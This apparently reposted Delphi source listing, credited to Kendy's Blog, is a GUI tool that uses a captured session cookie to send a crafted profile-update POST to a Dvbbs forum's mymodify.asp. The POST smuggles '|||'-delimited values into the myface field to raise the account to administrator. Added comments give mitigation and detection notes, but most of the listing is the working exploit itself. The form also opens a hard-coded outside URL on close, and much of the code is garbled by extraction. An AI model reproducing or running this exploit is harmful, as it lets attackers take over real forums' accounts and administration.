作者:Kendy 文章来源:Kendy’s Blog
unitUnit1;
interface
uses
Windows,Messages,SysUtils,Variants,Classes,Graphics,Controls,Forms,
Dialogs,ScktComp,StdCtrls,ComCtrls,WinSkinData,ShellApi;
type
// Main (and only) form of the tool. The component fields below are bound to
// the .dfm by name; the comments describe how the handlers in this unit use them.
TForm1=class(TForm)
Label1:TLabel;
Label2:TLabel;
Label3:TLabel;
// Edit1: forum address; Edit2: forum account name; Edit3: a captured session
// cookie (meanings taken from the "please enter ..." status messages in Button1Click).
Edit1:TEdit;
Edit2:TEdit;
Edit3:TEdit;
Button1:TButton;
// Client socket used to send the hand-built HTTP request on port 80.
ClientSocket1:TClientSocket;
GroupBox1:TGroupBox;
// Memo1 receives the text returned by the server (see ClientSocket1Read).
Memo1:TMemo;
// Label4 shows the success / failure verdict.
Label4:TLabel;
StatusBar1:TStatusBar;
// NOTE(review): TSkinData comes from the WinSkinData unit; presumably cosmetic
// only, it is not referenced by any handler in this unit.
SkinData1:TSkinData;
procedureButton1Click(Sender:TObject);
procedureClientSocket1Connect(Sender:TObject;
Socket:TCustomWinSocket);
procedureClientSocket1Read(Sender:TObject;Socket:TCustomWinSocket);
procedureClientSocket1Error(Sender:TObject;Socket:TCustomWinSocket;
ErrorEvent:TErrorEvent;varErrorCode:Integer);
procedureFormClose(Sender:TObject;varAction:TCloseAction);
private
{Privatedeclarations}
public
{Publicdeclarations}
end;
var
// The single form instance.
Form1:TForm1;
// Unit-level buffer holding the complete raw HTTP request (headers + body).
// It is filled by Button1Click and sent unchanged by ClientSocket1Connect, so it
// also holds the user's session cookie in clear text for as long as the unit lives.
Data:string;
implementation
{$R*.dfm}
// Click handler for Button1.
// Checks that the three edit boxes are non-empty, derives host and path from the
// forum address, assembles one raw HTTP POST for the forum's /mymodify.asp
// profile-update page into the global Data, and opens the socket to <host>:80.
// The request itself is sent later, from ClientSocket1Connect.
//
// The listing is reproduced exactly as published: extraction has removed
// whitespace (also inside string literals) and replaced the quote characters,
// so it does not compile as shown. Only comments have been added.
//
// Defender view: the fixed form body places a '|||'-delimited list of values
// (including the text for "administrator") inside the `myface` profile field.
// NOTE(review): presumably the server stores `myface` inside a '|||'-delimited
// account record without validating it, so the extra values replace neighbouring
// stored attributes - the server side is not shown on this page; confirm against
// the forum source. Mitigation on the server: reject or encode the '|||'
// delimiter in every client-supplied profile field and take group / role only
// from server-side state. Detection: POSTs to mymodify.asp whose `myface`
// parameter contains '|||'.
procedureTForm1.Button1Click(Sender:TObject);
var
sUrl,sUsername,sPOST,sReferer,sHost,sCookie,S:string;
i:integer;
begin
// Drop any connection left over from a previous click.
ClientSocket1.Close;
// Input checks only test for empty strings; the status text asks for the forum address.
ifedit1.Text=’’then
begin
StatusBar1.Panels[0].Text:=’请输入论坛地址!’;
exit;
end;
// Status text asks for the user's forum account.
ifedit2.Text=’’then
begin
StatusBar1.Panels[0].Text:=’请输入你的论坛账号!’;
exit;
end;
// Status text asks for the captured cookie.
ifedit3.Text=’’then
begin
StatusBar1.Panels[0].Text:=’请输入抓取的Cookie!’;
exit;
end;
// Reset the output widgets from the previous run.
memo1.Text:=’’;
StatusBar1.Panels[0].Text:=’’;
Label4.Caption:=’’;
sUrl:=edit1.Text;
// Pos is case-sensitive while the replace is case-insensitive, and only the
// first occurrence is removed (no rfReplaceAll).
ifPos(’http://’,sUrl)<>0then
sUrl:=StringReplace(sUrl,’http://’,’’,[rfIgnoreCase]);
// Account name and cookie are used verbatim below: no URL-encoding and no
// CR/LF filtering before they are placed in the request line and Cookie header.
sUsername:=edit2.Text;
sCookie:=edit3.Text;
//--------Host-------------
// Everything before the first '/' is the host; with no '/' the whole string is.
i:=Pos(’/’,sUrl);
ifi<>0then
// NOTE(review): Delphi strings are 1-based; index 0 presumably behaves like 1 here - confirm.
sHost:=Copy(sUrl,0,i-1)
else
sHost:=sUrl;
//--------Referer-----------
// The Referer names the target's own profile page, so a Referer-only check on the
// server would not tell this request apart from a browser form submit.
sReferer:=’http://’+sUrl+’/mymodify.asp’;
//--------POST--------------
// Remove the first occurrence of the host to leave the forum's path prefix,
// then append the update action and the account name as query parameters.
sPost:=StringReplace(sUrl,sHost,’’,[rfIgnoreCase]);
sPost:=sPost+’/mymodify.asp?action=updat&username=’+sUsername;
//--------Request body------------
// Entirely hard-coded form data; nothing typed by the user goes into it. The
// `myface` value carries the '|||'-separated fields described in the header
// comment, with constant dates and a constant IP address that can be matched in logs.
S:=’sex=1&face=Images%2Fuserface%2Fimage1.gif&myface=images/userface/image1.gif|||32|||32|||2003-12-30%’;
S:=S+’2016:34:00|||2005-6-19%2018:04:06|||25|||0|||管理员|||1||||||120|||115|||28|||0||||||210.41.235.200|||’;
S:=S+’0|||0|||0||||||0||||||level10.gif||||||9pc722664t5w7IM7|||0|0|0||||||Dvbbs&width=100&height=100’;
S:=S+’&birthday=&userphoto=&GroupName=%CE%DE%C3%C5%CE%DE%C5%C9&Signature=&showRe=0&usercookies=1&setuserinfo’;
S:=S+’=1&setusertrue=0&realname=&personal=&country=&userphone=&address=&province=&selectp=0&city=&selectc=0’;
S:=S+’&shengxiao=&blood=&belief=&occupation=&marital=&education=&college=&Submit=%B8%FC+%D0’;
// Request line and headers, each terminated with CR LF.
Data:=’POST’+sPost+’HTTP/1.1’+#13#10;
Data:=Data+’Accept:image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,application/vnd.ms-excel,application/msword,application/x-shockwave-flash,*/*’+#13#10;
Data:=Data+’Referer:’+sReferer+#13#10;
Data:=Data+’Accept-Language:zh-cn’+#13#10;
Data:=Data+’Content-Type:application/x-www-form-urlencoded’+#13#10;
Data:=Data+’Accept-Encoding:gzip,deflate’+#13#10;
Data:=Data+’User-Agent:Mozilla/4.0(compatible;MSIE6.0;WindowsNT5.1;Maxthon;TencentTraveler)’+#13#10;
Data:=Data+’Host:’+sHost+#13#10;
// The length is a fixed literal, not computed from S. Together with the constant
// User-Agent above it is a stable fingerprint of this tool in web-server logs.
Data:=Data+’Content-Length:585’+#13#10;
Data:=Data+’Connection:Keep-Alive’+#13#10;
Data:=Data+’Cache-Control:no-cache’+#13#10;
// The session cookie travels over plain HTTP (port 80 below); the blank line ends the headers.
Data:=Data+’Cookie:’+sCookie+#13#10+#13#10;
Data:=Data+S;
//--------Start sending the request-------------
// Open only starts the connection; the OnConnect handler performs the send.
ClientSocket1.Host:=sHost;
ClientSocket1.Port:=80;
ClientSocket1.Open;
// Status text: "sending data...".
StatusBar1.Panels[0].Text:=’数据发送中...’;
end;
// OnConnect handler for ClientSocket1.
// Sends the request that Button1Click stored in the unit-level Data buffer as
// soon as the connection is established. The return value of SendText is not
// checked, so a partial send goes unnoticed.
procedure TForm1.ClientSocket1Connect(Sender: TObject;
  Socket: TCustomWinSocket);
begin
  Socket.SendText(Data);
end;
// OnRead handler for ClientSocket1.
// Copies whatever text is currently available on the socket into Memo1 and
// decides the outcome from one marker only: the server's "your changes were
// submitted successfully" phrase. Each read event is judged on its own and
// replaces the memo contents.
// Defender view: that confirmation phrase is returned by the forum's
// profile-update page, so a successful response to a mymodify.asp POST that
// carried '|||' in a profile field is the event worth alerting on.
procedure TForm1.ClientSocket1Read(Sender: TObject;
  Socket: TCustomWinSocket);
var
  Confirmed: Boolean;
begin
  memo1.Text := Socket.ReceiveText;
  // The check reads the text back from the memo, exactly as the original does.
  Confirmed := Pos('您的修改信息已成功提交', memo1.Text) <> 0;
  if not Confirmed then
  begin
    // UI text: escalation failed / try another forum.
    Label4.Caption := '>>Sorry,提权失败';
    StatusBar1.Panels[0].Text := '失败,换个论坛试试。';
    Exit;
  end;
  // UI text: promoted to front-end administrator / log in to the forum again.
  Label4.Caption := '>>成功提升为前台管理员!';
  StatusBar1.Panels[0].Text := '成功,请重新登陆论坛!';
end;
// OnError handler for ClientSocket1.
// Shows a generic message in the status bar and clears ErrorCode, which stops
// the socket component from raising its own exception. The kind of failure
// (ErrorEvent) and the original error code are discarded, so connect, send and
// receive errors all look the same to the user.
procedure TForm1.ClientSocket1Error(Sender: TObject;
  Socket: TCustomWinSocket; ErrorEvent: TErrorEvent;
  var ErrorCode: Integer);
begin
  StatusBar1.Panels[0].Text := 'Error.....';
  ErrorCode := 0;
end;
// OnClose handler for the form.
// Every time the window is closed, the default handler for the 'open' verb
// (normally the browser) is launched on a hard-coded URL. Action is left
// untouched, so the form closes as usual.
// NOTE(review): when triaging a binary built from this unit, treat this as an
// unsolicited outbound navigation to a third-party site.
procedure TForm1.FormClose(Sender: TObject; var Action: TCloseAction);
const
  LaunchUrl = 'http://aliwy.77169.com';
begin
  ShellExecute(Handle, 'open', LaunchUrl, nil, nil, SW_SHOW);
end;
end.